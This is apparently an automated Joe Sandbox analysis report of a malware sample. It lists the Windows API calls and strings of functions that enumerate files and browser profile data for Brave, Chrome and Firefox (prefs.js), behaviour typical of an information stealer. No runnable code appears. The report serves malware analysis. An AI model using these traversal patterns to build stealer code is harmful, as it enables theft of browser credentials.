                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$P2#v$1#v
                                                  • API String ID: 1125553467-1890188023
                                                  • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                                  • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                                  • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID: Brave$Google Chrome$P2#v$Preferences$\Brave\Preferences$1#v
                                                  • API String ID: 3334442632-1392536997
                                                  • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                  • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                                  • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                                  • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0041492C
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                  • FindClose.KERNEL32(000000FF), ref: 00414B92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s$%s\%s$%s\*$P2#v$1#v
                                                  • API String ID: 180737720-322404123
                                                  • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                                  • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                  • wsprintfA.USER32 ref: 004145A6
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                  • lstrcatA.KERNEL32(?,0087B020,?,00000104), ref: 004146C5
                                                  • lstrcatA.KERNEL32(?,00879AB8), ref: 004146D8
                                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                  • String ID: %s\%s$%s\*$P2#v$1#v
                                                  • API String ID: 13328894-4226942003
                                                  • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                  • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B43B33
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B43B4A
                                                  • lstrcat.KERNEL32(?,?), ref: 00B43B9C
                                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00B43BAE
                                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 00B43BC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B43ECE
                                                  • FindClose.KERNEL32(000000FF), ref: 00B43EE3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 1125553467-0
                                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction ID: 9295ac4a3b2e48f5baee74f39110aa72147885627cc4b858231349176e9584e3
                                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                  • Instruction Fuzzy Hash: BEA14EB5A40218ABDB34DBA4CC85FEE73B9FB49700F0845C9E60D96141DB759B84CF62
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B44B93
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B44BAA
                                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B44BD8
                                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B44BEE
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B44DE4
                                                  • FindClose.KERNEL32(000000FF), ref: 00B44DF9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction ID: 409ce5fcebf88921b2f725961f76c1246b44ee92faa571b9a9ed2e1f5f769e92
                                                  • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                  • Instruction Fuzzy Hash: 0C6164B5940218ABCB24EBE0DD85FEA73BDFB49700F0485C8B60992141EB75AB45CF91
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00413EC3
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\%s$P2#v$1#v
                                                  • API String ID: 180737720-1025293131
                                                  • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                  • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 00B3C15C
                                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 00B3C1B4
                                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 00B3C1CA
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B3CA26
                                                  • FindClose.KERNEL32(000000FF), ref: 00B3CA38
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                  • Instruction ID: 240651885bf1ff907f8eca326186816c07296fa50cbeb8d62bdfe07b39b32628
                                                  • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                  • Instruction Fuzzy Hash: B04252B2940104ABCB14FBB4DD96EED77B9AF94300F4045ECB54AA6091EE349F48DF52
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B447E7
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B447EE
                                                  • wsprintfA.USER32 ref: 00B4480D
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B44824
                                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 00B44852
                                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00B44868
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B448F2
                                                  • FindClose.KERNEL32(000000FF), ref: 00B44907
                                                  • lstrcat.KERNEL32(?,0064A524), ref: 00B4492C
                                                  • lstrcat.KERNEL32(?,0064A22C), ref: 00B4493F
                                                  • lstrlen.KERNEL32(?), ref: 00B4494C
                                                  • lstrlen.KERNEL32(?), ref: 00B4495D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                  • String ID:
                                                  • API String ID: 671575355-0
                                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction ID: d8a46d69288f3d0d3fdc4691b4669530276e44587daf035463a9c5bba2664517
                                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                  • Instruction Fuzzy Hash: D65152B5580218AFCB24EBB0DD89FEE73BDEB58700F4045C8F64992190EB759B849F91
                                                  APIs
                                                  • wsprintfA.USER32 ref: 0040ED3E
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID: %s\*.*$P2#v$1#v
                                                  • API String ID: 180737720-3139634048
                                                  • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                  • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID: 4@$P2#v$\*.*$1#v
                                                  • API String ID: 2325840235-3454896120
                                                  • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                  • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID: P2#v$prefs.js$1#v
                                                  • API String ID: 3334442632-2885088814
                                                  • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                  • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                  • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID: P2#v$1#v
                                                  • API String ID: 3334442632-762677545
                                                  • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                                  • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                                  • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B4412A
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B44141
                                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00B4416F
                                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00B44185
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B442D3
                                                  • FindClose.KERNEL32(000000FF), ref: 00B442E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction ID: 98f91053c2d1e7812c2fab2fc104ef5b9fa678fb11f4d160bb31b045703e44a9
                                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                  • Instruction Fuzzy Hash: 0C515FB6940218BBCB24EBB0DD85FEA73BDFB58300F4085C8B64992040EB759B858F95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
